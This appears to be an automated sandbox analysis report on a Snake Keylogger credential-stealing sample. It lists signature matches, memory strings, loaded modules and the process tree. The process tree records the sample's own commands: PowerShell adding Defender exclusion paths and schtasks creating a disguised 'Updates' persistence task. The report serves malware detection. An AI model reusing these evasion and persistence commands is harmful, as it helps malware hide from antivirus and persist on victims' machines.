Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CE378	13_2_057CE378
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CE36B	13_2_057CE36B
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057C0B30	13_2_057C0B30
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CDF20	13_2_057CDF20
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057C0B20	13_2_057C0B20
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CE7D0	13_2_057CE7D0
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CE7CF	13_2_057CE7CF
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057C1FA8	13_2_057C1FA8
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057C1F9F	13_2_057C1F9F
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CD670	13_2_057CD670
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CD660	13_2_057CD660
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CD218	13_2_057CD218
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CDAC8	13_2_057CDAC8
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057CDAB9	13_2_057CDAB9
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 13_2_057C2A90	13_2_057C2A90

Source: SNKO05B241100201.exe, 00000000.00000002.1514440594.00000000057B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe, 00000000.00000002.1511841571.0000000002F20000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe, 00000000.00000002.1510465696.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe, 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe, 00000000.00000002.1515648670.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe, 00000000.00000002.1514920700.00000000071B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameiHtK.exe4 vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe, 00000000.00000002.1511841571.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe, 00000008.00000002.3926594341.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe, 00000008.00000002.3927025207.0000000000BD7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SNKO05B241100201.exe
Source: SNKO05B241100201.exe	Binary or memory string: OriginalFilenameiHtK.exe4 vs SNKO05B241100201.exe

Source: SNKO05B241100201.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SNKO05B241100201.exe.46bc160.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SNKO05B241100201.exe.46bc160.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SNKO05B241100201.exe.46bc160.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SNKO05B241100201.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: SNKO05B241100201.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HURBBASu.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, --.cs	Base64 encoded string: 'z5BMSL7T3yeWJdhfdKNmUcbUtOxFS0FtVYHSWq3oJMZdbWmwYVSfFQCWkFbmp8oj'
Source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, --.cs	Base64 encoded string: 'z5BMSL7T3yeWJdhfdKNmUcbUtOxFS0FtVYHSWq3oJMZdbWmwYVSfFQCWkFbmp8oj'

Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, lW0RgU03WCtEMtvXHa.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, lW0RgU03WCtEMtvXHa.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, RvrlIneKRZR8s32r8h.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, RvrlIneKRZR8s32r8h.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, RvrlIneKRZR8s32r8h.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

File created: C:\Users\user\AppData\Roaming\HURBBASu.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Mutant created: \Sessions\1\BaseNamedObjects\wXayIjkKNrlYu
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:120:WilError_03

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

File created: C:\Users\user\AppData\Local\Temp\tmp23A6.tmp

Jump to behavior

Source: SNKO05B241100201.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SNKO05B241100201.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp, SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002F83000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SNKO05B241100201.exe	Virustotal: Detection: 40%
Source: SNKO05B241100201.exe	ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

File read: C:\Users\user\Desktop\SNKO05B241100201.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SNKO05B241100201.exe "C:\Users\user\Desktop\SNKO05B241100201.exe"
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HURBBASu.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Users\user\Desktop\SNKO05B241100201.exe "C:\Users\user\Desktop\SNKO05B241100201.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HURBBASu.exe C:\Users\user\AppData\Roaming\HURBBASu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp3588.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process created: C:\Users\user\AppData\Roaming\HURBBASu.exe "C:\Users\user\AppData\Roaming\HURBBASu.exe"
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HURBBASu.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Users\user\Desktop\SNKO05B241100201.exe "C:\Users\user\Desktop\SNKO05B241100201.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp3588.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process created: C:\Users\user\AppData\Roaming\HURBBASu.exe "C:\Users\user\AppData\Roaming\HURBBASu.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
